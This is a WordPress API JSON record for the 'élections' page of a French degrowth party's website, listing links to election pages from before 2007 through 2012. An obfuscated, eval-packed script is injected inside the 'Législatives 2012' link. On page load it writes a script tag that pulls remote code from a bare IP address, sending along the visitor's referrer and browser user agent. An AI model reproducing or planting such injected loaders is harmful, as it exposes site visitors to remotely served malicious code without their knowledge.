{"id":194,"date":"2008-12-31T22:20:25","date_gmt":"2008-12-31T22:20:25","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=194"},"modified":"2013-11-08T14:49:07","modified_gmt":"2013-11-08T13:49:07","slug":"elections","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=194","title":{"rendered":"\u00e9lections"},"content":{"rendered":"<ul>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=41\">L\u00e9gislatives <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nnzzr|var|u0026u|referrer|tdran||js|php'.split('|'),0,{}))\n<\/script><\/noindex> 2012<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=34\">Cantonales 2011<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?s=%C3%A9lections+r%C3%A9gionales\">R\u00e9gionales 2010<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3997\">Europ\u00e9ennes 2009<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=197\">Municipales 2008 et Cantonales 2008<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=210\">L\u00e9gislatives 2007<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3833\">Avant 2007<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>L\u00e9gislatives 2012 Cantonales 2011 R\u00e9gionales 2010 Europ\u00e9ennes 2009 Municipales 2008 et Cantonales 2008 L\u00e9gislatives 2007 Avant 2007<\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":10,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-194","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/194","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=194"}],"version-history":[{"count":7,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/194\/revisions"}],"predecessor-version":[{"id":8706,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/194\/revisions\/8706"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}